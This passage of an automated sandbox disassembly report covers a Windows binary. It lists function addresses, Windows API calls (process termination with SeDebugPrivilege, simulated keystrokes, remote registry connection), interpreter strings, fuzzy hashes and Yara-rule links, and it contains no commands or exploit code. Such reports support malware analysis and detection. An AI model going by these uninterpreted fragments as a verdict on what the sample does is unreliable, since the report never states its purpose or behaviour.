Part of subcall function 005F2B4F: GetLastError.KERNEL32(?,?,005F1EE3,00000000,00000000,00000001), ref: 005F2B64
Part of subcall function 005F2B4F: SetEvent.KERNEL32(?,?,005F1EE3,00000000,00000000,00000001), ref: 005F2B79

Strings

, xrefs: 005F21CD

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: f27033c5c55fc157e5cbe94bfe552aac72ef034ced391927ed10ee651f927cc3
Instruction ID: 919e98f7076c52858de07bdf26177bd16a57955ea71dc7a5718f3130aa23cbb2
Opcode Fuzzy Hash: f27033c5c55fc157e5cbe94bfe552aac72ef034ced391927ed10ee651f927cc3
Instruction Fuzzy Hash: 57418AB5501209BFEB129F50CC89FFF7BADFB08350F048016FA059A191DBB89E448BA1

Function 005F9330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00610980), ref: 005F9412
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00610980), ref: 005F9446
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 005F95C0
SysFreeString.OLEAUT32(?), ref: 005F95EA

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 0fcd1687e62520fb94773804fc9389511b39d0bc82c7da5f4b136cf9a6db5df9
Instruction ID: eb7b880bec5da1c3ec21ee2fe98e26f549325ca6553c76e94746ccf0206acfb3
Opcode Fuzzy Hash: 0fcd1687e62520fb94773804fc9389511b39d0bc82c7da5f4b136cf9a6db5df9
Instruction Fuzzy Hash: 22F12971A00219AFDF14DF94C888EBEBBB9FF85314F108459FA06AB251DB35AE45CB50

Function 005FFD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005FFD9E
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 005FFF31
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 005FFF55
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005FFF95
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005FFFB7
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00600133
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00600165
CloseHandle.KERNEL32(?), ref: 00600194
CloseHandle.KERNEL32(?), ref: 0060020B

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 40e28842f54eb5c32023cfc15fd14763cac4e4abbb9549bf16ae80d03bf018c5
Instruction ID: a402711eec8b561e35492b51f0fed1d1b9bb1026c355a5d403ea1f7ae301edd2
Opcode Fuzzy Hash: 40e28842f54eb5c32023cfc15fd14763cac4e4abbb9549bf16ae80d03bf018c5
Instruction Fuzzy Hash: 2EE1BF312042429FDB14EF24C899B6FBBE5BF85314F14896DF9859B2A2DB31EC41CB52

Function 005E527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 005E4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005E3B8A,?), ref: 005E4BE0

Part of subcall function 005E4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005E3B8A,?), ref: 005E4BF9

Part of subcall function 005E4FEC: GetFileAttributesW.KERNEL32(?,005E3BFE), ref: 005E4FED

lstrcmpiW.KERNEL32(?,?), ref: 005E52FB
_wcscmp.LIBCMT ref: 005E5315
MoveFileW.KERNEL32(?,?), ref: 005E5330

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 5a80c74538530bd65e264a4e375ef301e00d990c453efad6f1b0dfcdc19cc1b8
Instruction ID: e74f2b78b1d8c3eeb803e4cc503bf9abc097726b29e023321fd0f89ebf40ac11
Opcode Fuzzy Hash: 5a80c74538530bd65e264a4e375ef301e00d990c453efad6f1b0dfcdc19cc1b8
Instruction Fuzzy Hash: A75174B10087865BCB24EBA4D8859DFBBECBF85340F50492EF1C5C3152EF74A6888756

Function 00608C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00608D24

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 48650a4592153dea40bb0f808eb2337e59c4924e9f6b1447c91c4767c351194a
Instruction ID: 093453d3b57ed95660659b1b79353d828b28f354fc4ba0ad16a11c7c6d60cbf3
Opcode Fuzzy Hash: 48650a4592153dea40bb0f808eb2337e59c4924e9f6b1447c91c4767c351194a
Instruction Fuzzy Hash: 90519130680204BFEF28DF24CC89B9A7B66AF15350F244516F995E72E1CFB1A9909B64

Function 00582F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 005BC638
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005BC65A
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005BC672
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 005BC690
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005BC6B1
DestroyIcon.USER32(00000000), ref: 005BC6C0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 005BC6DD
DestroyIcon.USER32(?), ref: 005BC6EC

Part of subcall function 0060AAD4: DeleteObject.GDI32(00000000), ref: 0060AB0D

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 3ff9ebebdfdaeb2aaab3589884d4d73e7ea170fdfd841425a3a3bca7ae8250dc
Instruction ID: af7647c29d86740193cd8855a3ec5c6b41b5752d2cbbbddfea0aaa58ced9a377
Opcode Fuzzy Hash: 3ff9ebebdfdaeb2aaab3589884d4d73e7ea170fdfd841425a3a3bca7ae8250dc
Instruction Fuzzy Hash: 40515C74600209AFDB24EF24CC46FAA7FB6FB58710F104929F956E7290DB70AD90DB50

Function 005DA226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 005DB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005DB54D
Part of subcall function 005DB52D: GetCurrentThreadId.KERNEL32 ref: 005DB554
Part of subcall function 005DB52D: AttachThreadInput.USER32(00000000,?,005DA23B,?,00000001), ref: 005DB55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 005DA246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005DA263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 005DA266
MapVirtualKeyW.USER32(00000025,00000000), ref: 005DA26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005DA28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005DA290
MapVirtualKeyW.USER32(00000025,00000000), ref: 005DA299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005DA2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005DA2B3

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e841704c94cac6cc36d6611cbb5f6e47a9c9e99b937da3271de78e7ddf8ab3c8
Instruction ID: bdea534b1b3d9f5040bca1e27114f1bfb39441d84c4b428909e1b916b26753fc
Opcode Fuzzy Hash: e841704c94cac6cc36d6611cbb5f6e47a9c9e99b937da3271de78e7ddf8ab3c8
Instruction Fuzzy Hash: 3E11C271550218BEFB206B65DC4AFAA3E1EEB8C750F115417F2406B190CAF25C909AA0

Function 005D94D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,005D915A,00000B00,?,?), ref: 005D94E2
HeapAlloc.KERNEL32(00000000,?,005D915A,00000B00,?,?), ref: 005D94E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005D915A,00000B00,?,?), ref: 005D94FE
GetCurrentProcess.KERNEL32(?,00000000,?,005D915A,00000B00,?,?), ref: 005D9506
DuplicateHandle.KERNEL32(00000000,?,005D915A,00000B00,?,?), ref: 005D9509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,005D915A,00000B00,?,?), ref: 005D9519
GetCurrentProcess.KERNEL32(005D915A,00000000,?,005D915A,00000B00,?,?), ref: 005D9521
DuplicateHandle.KERNEL32(00000000,?,005D915A,00000B00,?,?), ref: 005D9524
CreateThread.KERNEL32(00000000,00000000,005D954A,00000000,00000000,00000000), ref: 005D953E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: cde21b4c98c0b7d300b34a16f9588e99dbe91aa57401948f1911e97ccf364e28
Instruction ID: 9b37df57d6e97529cc5e8536fae8909756cf5aa3bf8afa3d9615641b2f58a931
Opcode Fuzzy Hash: cde21b4c98c0b7d300b34a16f9588e99dbe91aa57401948f1911e97ccf364e28
Instruction Fuzzy Hash: A501C2B5240344BFFB10AFA5DC4EFA77B6DEB89711F049412FA05DB191CAB59840CB20

Function 005FA20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 005FA28E, 005FA5B2
Not an Object type, xrefs: 005FA265

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 64c6b4f88937071f8a5f3a6695ca282ff61c6d63ec90172c717baad4d277fbc3
Instruction ID: b6a40303d39de1b0bcb7246c7f0443f6eb54de8e3820a7472163695ddee81cb7
Opcode Fuzzy Hash: 64c6b4f88937071f8a5f3a6695ca282ff61c6d63ec90172c717baad4d277fbc3
Instruction Fuzzy Hash: 86C184B1A0021E9FDF10DF58C885ABEBBF5FB48314F148469EA09AB281E7749D45CB52

Function 005FF01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 005E4148: CreateToolhelp32Snapshot.KERNEL32 ref: 005E416D
Part of subcall function 005E4148: Process32FirstW.KERNEL32(00000000,?), ref: 005E417B
Part of subcall function 005E4148: CloseHandle.KERNEL32(00000000), ref: 005E4245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 005FF08D
GetLastError.KERNEL32 ref: 005FF0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 005FF0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 005FF14C
GetLastError.KERNEL32(00000000), ref: 005FF157
CloseHandle.KERNEL32(00000000), ref: 005FF18C

Strings

SeDebugPrivilege, xrefs: 005FF0AB

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: c46f58a645255d892c615ce8168fa5eebff3dd7420ed1839f9fc2399b688c534
Instruction ID: 0beb1e1e8ecfd5d6a77cf85f22ef7abcaeb95744cb5cad95c25f07967930ff77
Opcode Fuzzy Hash: c46f58a645255d892c615ce8168fa5eebff3dd7420ed1839f9fc2399b688c534
Instruction Fuzzy Hash: D841A2312002069FDB25EF64CC9AF7DBBA5BF84714F08845AF9425B392DBB4A844CB95

Function 005E47E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 005E4802
LoadStringW.USER32(00000000), ref: 005E4809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 005E481F
LoadStringW.USER32(00000000), ref: 005E4826
_wprintf.LIBCMT ref: 005E484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 005E486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 005E4847

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 712d91bd0997ef76ae5f943ba135d0f40976908971a6ec2a3cf3b01082f2f8a9
Instruction ID: 01edea93f8e753f8a55d140d9ef2b1a4add09adc894acdb7c3799450d473864e
Opcode Fuzzy Hash: 712d91bd0997ef76ae5f943ba135d0f40976908971a6ec2a3cf3b01082f2f8a9
Instruction Fuzzy Hash: D501A2F29002487FFB119BA09D89EF7777DE708300F048596B749E2001EAB49EC44BB0

Function 0060DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005829E2: GetWindowLongW.USER32(?,000000EB), ref: 005829F3

GetSystemMetrics.USER32(0000000F), ref: 0060DB42
GetSystemMetrics.USER32(0000000F), ref: 0060DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0060DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0060DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0060DDDC
ShowWindow.USER32(00000003,00000000), ref: 0060DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 0060DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 0060DE43

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: f0986a24621d913ea6a32c19d2fa34246b682ff2d4fb46f85164aff55bcde165
Instruction ID: 2d60a98a7637619612df4a987fa657122f0a2f9b8e35adcaaae293e342f608d3
Opcode Fuzzy Hash: f0986a24621d913ea6a32c19d2fa34246b682ff2d4fb46f85164aff55bcde165
Instruction Fuzzy Hash: 25B18971640215AFDF18CFA9C9857FE7BB2FF04701F08826AEC489E295D771A990CB90

Function 00600371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00591A36: _memmove.LIBCMT ref: 00591A77

Part of subcall function 0060147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0060040D,?,?), ref: 00601491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0060044E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: fcf95d068ee7844e2238f5136d43e906be15f4c9dffaed099f2f955576840213
Instruction ID: 8db33e7d516d6bd24a7b312cdaccc07d09245ad5fa5317be4537c1af25bea73d
Opcode Fuzzy Hash: fcf95d068ee7844e2238f5136d43e906be15f4c9dffaed099f2f955576840213
Instruction Fuzzy Hash: 60A19C302442029FDB15EF64C885B6EBBE6FF84314F04891DF9969B2A2DB31E945CF46

Function 00582E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,005BC508,00000004,00000000,00000000,00000000), ref: 00582E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,005BC508,00000004,00000000,00000000,00000000,000000FF), ref: 00582EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,005BC508,00000004,00000000,00000000,00000000), ref: 005BC55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,005BC508,00000004,00000000,00000000,00000000), ref: 005BC5C7

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0a484da6ed4cf53e9c017d245974fee216881936a231a9da6cd14a9a3e8d40f6
Instruction ID: 726c3ca35a60a38c693e8d64affef6417ce8c17a778597e6a5881c5d2e738dbc
Opcode Fuzzy Hash: 0a484da6ed4cf53e9c017d245974fee216881936a231a9da6cd14a9a3e8d40f6
Instruction Fuzzy Hash: 6341F2706046849EEB35A728CC8C7BA7F9BBB95300F18885DEC47B65E1C771B984D718

Function 005E7681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 005E7698

Part of subcall function 005A0FE6: std::exception::exception.LIBCMT ref: 005A101C
Part of subcall function 005A0FE6: __CxxThrowException@8.LIBCMT ref: 005A1031

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 005E76CF
EnterCriticalSection.KERNEL32(?), ref: 005E76EB
_memmove.LIBCMT ref: 005E7739
_memmove.LIBCMT ref: 005E7756
LeaveCriticalSection.KERNEL32(?), ref: 005E7765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005E777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 005E7799

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: a83b72f990722da2fa15ff33574c6e18c28a52a12e6b08b63184d89bb815731e
Instruction ID: 8290eec89da5e0cfb078bc5fa14319df953906f87067bdff6ebcfab3e408620b
Opcode Fuzzy Hash: a83b72f990722da2fa15ff33574c6e18c28a52a12e6b08b63184d89bb815731e
Instruction Fuzzy Hash: 6C317071904209EBDF10EF55DC89EAEBB79FF85310F1880A6FD04AB256D7709A50DBA0

Function 006067F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00606810
GetDC.USER32(00000000), ref: 00606818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00606823
ReleaseDC.USER32(00000000,00000000), ref: 0060682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0060686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0060687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0060964F,?,?,000000FF,00000000,?,000000FF,?), ref: 006068B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006068D6

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
